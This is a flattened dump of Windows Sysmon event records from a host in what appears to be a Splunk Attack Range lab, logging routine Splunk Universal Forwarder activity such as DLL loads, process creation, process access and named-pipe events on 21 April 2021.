Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x80000000000000001531069Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x80000000000000001531068Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ntdll.dll10.0.14393.4350 (rs1_release.210407-2154)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=4C8F6DF16BD8E2739EC0D3439EA7507C,SHA256=79E203951A298D2818A9484A56521FA70DF19B7053F704378375128C7C48E8EEtrueMicrosoft WindowsValid 734700x80000000000000001531067Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241trueSplunk, Inc.Valid 10341000x80000000000000001531066Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.971{21761711-83AC-607D-0500-00000000BB01}412428C:\Windows\system32\csrss.exe{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001531065Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.971{21761711-842A-607D-9700-00000000BB01}37163760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001531064Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.972{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{21761711-83AD-607D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241{21761711-842A-607D-9700-00000000BB01}3716C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 18141800x80000000000000001531063Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 17:30:31.971{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001531062Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 17:30:31.971{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x80000000000000001531061Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 17:30:31.971{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 
17141700x80000000000000001531060Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 17:30:31.971{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x80000000000000001531059Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 17:30:31.971{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001531058Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 17:30:31.971{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 534500x80000000000000001531057Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.439{21761711-6137-6080-C05D-00000000BB01}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe 734700x80000000000000001531056Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.439{21761711-6137-6080-C05D-00000000BB01}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 734700x80000000000000001531055Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.439{21761711-6137-6080-C05D-00000000BB01}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146trueMicrosoft 
WindowsValid 734700x80000000000000001531054Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.439{21761711-6137-6080-C05D-00000000BB01}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1AtrueMicrosoft WindowsValid 734700x80000000000000001531053Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.307{21761711-6137-6080-C05D-00000000BB01}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x80000000000000001531052Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.307{21761711-6137-6080-C05D-00000000BB01}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\rsaenh.dll10.0.14393.2969 (rs1_release.190503-1820)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=B6E99FD898E948657373BB02708C7C00,SHA256=90476029BD7AB0FEC53AAE567AE53BC0B09C7C5C8C7B8F19485BA872B74ED591trueMicrosoft WindowsValid 734700x80000000000000001531051Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.307{21761711-6137-6080-C05D-00000000BB01}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft 
Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 18141800x80000000000000001531050Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 17:30:31.307{21761711-6137-6080-C05D-00000000BB01}5820\srvsvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe 734700x80000000000000001531049Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.307{21761711-6137-6080-C05D-00000000BB01}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 18141800x80000000000000001531048Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 17:30:31.307{21761711-6137-6080-C05D-00000000BB01}5820\wkssvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe 734700x80000000000000001531047Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.307{21761711-6137-6080-C05D-00000000BB01}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\bcrypt.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=51F4F9025E6D236F5BF2C24C09E42C8E,SHA256=AE196933C3E292680C83B09F24CE9E6D498E34ECDD30ACB8C1544EEB4705F285trueMicrosoft WindowsValid 734700x80000000000000001531046Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.307{21761711-6137-6080-C05D-00000000BB01}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\wkscli.dll10.0.14393.0 
(rs1_release.160715-1616)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3DCBAE237E4E1F0EBE8E7DC053F778C4,SHA256=C3331CCBE71CC98A5F1BC013F1C0218FE194CA7B497DDF706BF9025AB5A7B330trueMicrosoft WindowsValid 734700x80000000000000001531045Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.307{21761711-6137-6080-C05D-00000000BB01}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x80000000000000001531044Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.307{21761711-6137-6080-C05D-00000000BB01}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\netapi32.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=F55166956AEAD05A141BA7E80B90AB7B,SHA256=B9BCF21D7F7E771C388C469B2611E8946166C62005B56D72421060DABFF7093FtrueMicrosoft WindowsValid 734700x80000000000000001531043Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.307{21761711-6137-6080-C05D-00000000BB01}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\sspicli.dll10.0.14393.2580 (rs1_release_inmarket.181009-1745)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsspicli.dllMD5=5061339CE61C0B32DB8F51A95E3B2422,SHA256=60558CA374334D4C6BBAD475921538C14A9FF3422893348A0503C1F33015FD25trueMicrosoft WindowsValid 734700x80000000000000001531042Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
17:30:32.673{21761711-6138-6080-C25D-00000000BB01}6292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4350 (rs1_release.210407-2154)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=BC930981DA6E598A6A2E87D8355CB38A,SHA256=34DB9A305C0574B5C1694A499221B520DFB2BFD894D8E95096ABF09F1182D758trueMicrosoft WindowsValid 734700x80000000000000001531144Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.673{21761711-6138-6080-C25D-00000000BB01}6292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=F30BB43EC30BE50400780223450492CD,SHA256=867D0453E285A5C29A4EFA039D2399662DCCAC98F88C46B0A41CEFB6B68DD836trueSplunk, Inc.Valid 734700x80000000000000001531143Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.673{21761711-6138-6080-C25D-00000000BB01}6292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=D98BAB348C28C8CFCC11EDB575E2557A,SHA256=ADA3F1256B175ECC390F126D2730D7A1AAB5A53F1AF205A7667D8010416602F9trueSplunk, Inc.Valid 734700x80000000000000001531142Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.673{21761711-6138-6080-C25D-00000000BB01}6292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=B20FA07A7A61791EE537B5945429E141,SHA256=EF53BC2AB58BC548EFA249B0B8F2E1FBB9D4739EF27B0C67DFF1468D555329D3trueSplunk, Inc.Valid 734700x80000000000000001531141Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.673{21761711-6138-6080-C25D-00000000BB01}6292C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x80000000000000001531140Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.673{21761711-6138-6080-C25D-00000000BB01}6292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x80000000000000001531139Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.673{21761711-6138-6080-C25D-00000000BB01}6292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=B8D3119CE62331C6A9B170DA0A608F28,SHA256=7D6C6B7C542B4E67AA468FEB12044E2EE34CE8F8A68C7665D7861F3363B6E66AtrueSplunk, Inc.Valid 734700x80000000000000001531138Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.673{21761711-6138-6080-C25D-00000000BB01}6292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x80000000000000001531137Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.673{21761711-6138-6080-C25D-00000000BB01}6292C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438trueMicrosoft WindowsValid 734700x80000000000000001531136Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.673{21761711-6138-6080-C25D-00000000BB01}6292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.9libxml2 librarylibxml2-libxml2.dllMD5=0E7B7B3B25A2F094EB3A7BAF471154B8,SHA256=6CFAC8D8D5B7345F2C6CC82CBF8F9DD475881EA260346BE283E52B822F2CCAC1trueSplunk, Inc.Valid 734700x80000000000000001531135Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.673{21761711-6138-6080-C25D-00000000BB01}6292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\secur32.dll10.0.14393.2273 (rs1_release_1.180427-1811)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecur32.dllMD5=BCF1B2F76F8A3A3E9E8F4D4322954651,SHA256=46B327CD50E728CBC22BD80F39DCEF2789AB780C77B6D285EEB90126B06EEEB5trueMicrosoft WindowsValid 734700x80000000000000001531134Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.673{21761711-6138-6080-C25D-00000000BB01}6292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\advapi32.dll10.0.14393.2969 (rs1_release.190503-1820)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=F5442C4B9A99C3AED71BED79AC46DAD1,SHA256=05F47403F3BD93FB11F39A5CB4D6E4DD08B35FF4FA3D4969D8E5396D38FB484BtrueMicrosoft WindowsValid 10341000x80000000000000001531133Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
17:30:32.673{21761711-842B-607D-9B00-00000000BB01}31683556C:\Windows\system32\conhost.exe{21761711-6138-6080-C25D-00000000BB01}6292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001531132Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.673{21761711-6138-6080-C25D-00000000BB01}6292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x80000000000000001531131Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.673{21761711-6138-6080-C25D-00000000BB01}6292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x80000000000000001531130Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.673{21761711-6138-6080-C25D-00000000BB01}6292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\ntdll.dll10.0.14393.4350 (rs1_release.210407-2154)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=4C8F6DF16BD8E2739EC0D3439EA7507C,SHA256=79E203951A298D2818A9484A56521FA70DF19B7053F704378375128C7C48E8EEtrueMicrosoft WindowsValid 
734700x80000000000000001531129Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.673{21761711-6138-6080-C25D-00000000BB01}6292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exeMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42trueSplunk, Inc.Valid 10341000x80000000000000001531128Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.657{21761711-83AC-607D-0500-00000000BB01}412428C:\Windows\system32\csrss.exe{21761711-6138-6080-C25D-00000000BB01}6292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001531127Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.657{21761711-842A-607D-9700-00000000BB01}37163760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{21761711-6138-6080-C25D-00000000BB01}6292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001531126Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.658{21761711-6138-6080-C25D-00000000BB01}6292C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{21761711-83AD-607D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42{21761711-842A-607D-9700-00000000BB01}3716C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 18141800x80000000000000001531125Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 17:30:32.657{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001531124Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 17:30:32.657{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x80000000000000001531123Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 17:30:32.657{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001531122Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 17:30:32.657{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x80000000000000001531121Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 17:30:32.657{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001531120Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 17:30:32.657{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 11241100x80000000000000001531119Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.306{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001531118Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.306{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DA1253FAC9FB4E532E86A73D406FD293,SHA256=C4AB2845DB15AEA4F9BDD5DCFEC8E4FC9F0DF58C2605C948B9AAECC64675DD55falsefalse - insufficient disk space 11241100x80000000000000001531117Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.172{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 